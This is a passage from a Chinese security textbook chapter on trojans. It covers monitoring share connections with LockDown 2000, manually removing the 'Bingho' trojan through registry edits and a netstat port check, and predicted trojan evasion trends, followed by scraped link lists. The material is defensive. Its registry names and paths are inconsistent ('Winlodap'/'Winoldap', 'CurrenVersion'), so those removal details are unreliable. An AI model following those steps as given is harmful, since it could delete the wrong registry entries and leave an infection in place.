Connections】选项卡中,坐标的树状列表框中列出了正在被远程用户连接的共 享资源 C$,从列表框右边的【Network Information】 (网络信息)中,列出了该连接开始的时间、连接已经持续的时间,以及远程用户所在计算机的 IP 地址和计算 机名称。 LockDown 2000 还能记录共享资源被自动连接的信息,只要使用过共享资源,所有的记录都会被保留下来。如果允许任何人进入 LockDown 2000 的主窗口,反而会 使安装了 LockDown 2000 的计算机变得更加的不安全,所以最好对 LockDown 2000 设置密码。 具体操作步骤如下: ① 在 LockDown 2000 的主窗口中,选择菜单【View】→【Password】命令。 ② 打开密码设置对话框,在该对话框中密码设置好后,单击【OK】按钮完成密码设置。 ③ 此后如果再重新打开 LockDown 2000,LockDown 2000 就会要求用户输入密码了。 LockDown 2000 的最大优点就在于:在还没有受到任何损失之前,就提醒追踪和阻挡黑客的攻击,并能识别出黑客和他所使用的 ISP 和计算机服务器名称。 3-5-5 如何手动清除木马 除了用特殊软件清除木马外,还有一种方法就是手动清除。当然,手动清除的前提是必须对这个木马程序有足够的了解,否则是很难成功清除的。本节仍然以“冰河” 为例,演示如何清除一个木马程序。 具体操作步骤如下: ① 选择【开始】→【运行】命令并输入 regedit,打开【注册表编辑器】窗口。 ②打开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sun,如图 3-103 所示。 ③ 右击 Winlodap,将弹出快捷菜单如图 3-104 所示选择【删除】命令,将其删除。 图 3-103 【注册表编辑器】窗口 图 3-104 注册表项的快捷菜单 ④ 打开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrenVersion\sun services,如图 3-105 所示。 ⑤ 同③的操作一样,删除 Winoldap 项。 ⑥ 重新启动计算机。这时因为注册表中没有木马的启动信息,所以木马程序不会运行。然后,到 D:\WINDOWS\System32\目录下直接删除 Winoldap.exe。如果一 开始就删除该文件是不能成功的,因为该程序正在运行。 图 3-105 打开 sunservices 文件夹 ⑦ 为了检测木马程序是否已被清除,可以在【命令提示符】窗口中输入“netstat –a”命令看看 2001 端口是否开放,如果没有开放,则表示清除成功。 3.5.6 木马未来的发展方向 在对木马有了充分的认识之后,就可以基本上描绘出木马未来发展的大致方向了,主要有如下的 3 个方面: ① 传统的 TCP 端点对点连接会被抛弃,未来木马要采用非 TCP/UDP 的 IP 簇数据封包,它们十分隐蔽,如果不对数据封包详细分析,很难察出木马入侵;如果采 用寄生 TCP 端口,这样木马传输的数据封包和正常的数据封包很难区分开来。 ② 在传播方式上,未来木马会和病毒一样,采用交叉式迅速大规模扩散,并且执行方式越来越隐蔽,可能通过浏览一个 HTML 网页即可把木马植入自己的计算机主 机。 ③ 未来木马将更注重网络底层的通讯编辑程序,如针对网络卡和 Modem 的通讯编辑程序,这样可以逃过低阶防火墙的监视和过滤。 本章介绍了木马的组成,讲解了木马服务器端的配置、作用及隐藏方法,还讲述了客户端的使用方法。从中可以看出,木马的功能十分强大,因此十分危险。有些木 马甚至具有病毒的功能,除了给黑客提供远程控制的服务外,它还会修改计算机中的文件、破坏硬盘等。 木马攻击并不可怕,只要通过防火墙采用适当的规则,即使攻击者想尽办法把木马植入到自己的计算机里面,也是不能做什么破坏的。 目前大部分木马都是采用 TCP 连接的方式使攻击者控制计算机主机,攻击者要通过一定的通讯端口连接进来, 如果通过设置防火墙设定了过滤,除非必需的几个通

讯端口外的数据封包,大多数木马是无法与攻击者产生联系的。通常中了木马后,上网速度会变得很慢,因为木马服务器程序占用了过多的网络资源。当有人试图控 制的时候计算机会变得非常慢,如果此时断线,速度会突然快起来。 以上这些都是中了木马后计算机的明显特征,当然最好的方法还是通过 The Cleaner 或杀毒软件对其进行查杀。


相关文档

  • 5 木马的攻击与防治
  • 木马的攻击与防范技术研究
  • 木马攻击与防范
  • 研究“特洛伊木马”的攻击和防护
  • 木马攻击防范理论与技术研究
  • 计算机木马攻击与检测的探讨与研究
  • 木马攻击与防范技术研究
  • 特洛伊木马术攻击方法和对它的防范对策
  • 猜你喜欢

  • 适用于转录组测序的灰毡毛忍冬体胚总RNA提取方法筛选
  • 西安佳之宏商贸有限公司企业信用报告-天眼查
  • 初三抒情哲理散文:深巷_100字
  • *头铆螺母
  • Windows XP撤退后 企业级用户需考虑的关键问题
  • 水利水电工程建设中的生态环境问题探析(1)
  • 青岛啤酒(台州)有限公司(企业信用报告)- 天眼查
  • 2014届名师导学高考物理第一轮复*课件:第七章 电路 人教版
  • GWT技术介绍
  • 【深圳市住房和建设局】建设局综合类行政执法自检自查总结
  • 福安市鑫浩食杂店企业信息报告-天眼查
  • 小米手机音量键丢了怎么办
  • 【优化方案】高考英语一轮复* 第二部分 第九讲 语法专练知能闯关名词性从句(含解析)
  • 襄城县永晟商贸有限公司企业信用报告-天眼查
  • 夏天用冷水洗脸好吗冷水洗脸危害很大
  • 十万个为什么知识整理
  • 有关难忘的小学生活作文
  • 廉租房买卖合同范本
  • 执业西药师药理学辅导:贝特类的药代学
  • 沪教版数学二下1.5《连乘、连除》ppt课件3
  • 怎么把文件压缩小点
  • 蚌埠市旺佳美食品有限公司企业信用报告-天眼查
  • 在imx6q上移植ubuntu16.04系统
  • 信用卡分期付款购车合同
  • 宋体字怎么设置
  • Hadoop2.6.0+Spark1.4.0集群安装
  • 南通杭尊金属材料有限公司企业信息报告-天眼查
  • 拥抱青春作文800字
  • 鄱阳县宏兴砂石开发有限公司企业信用报告-天眼查
  • 2017_2018学年七年级数学下学期期中试题北师大版
  • 《太空生活趣事多》练*题部编教材
  • 2019元旦快乐祝福语_节日祝福短信
  • 七年级美术下册 第4课 扮靓生活的花卉纹样教案2 湘美版
  • 【人教版】2020版高考地理一轮总复*:课时冲关22世界农业地域类型含解析新人教版
  • 因为你,我不要说哭泣
  • 2020最新版高考复*文言文翻译强化训练PPT15[优质实用版课件]
  • 爹系男友什么意思?有啥特点
  • SEO必知的100个网站优化问答(八)
  • 2011年版中国铁路施工物资采购项目经理手机通讯录
  • 上海某社区高龄独居老人意外伤害现况的调查与分析
  • 2011年机关党建工作总结
  • 口腔内科学 粘膜病 PPT课件
  • 电脑版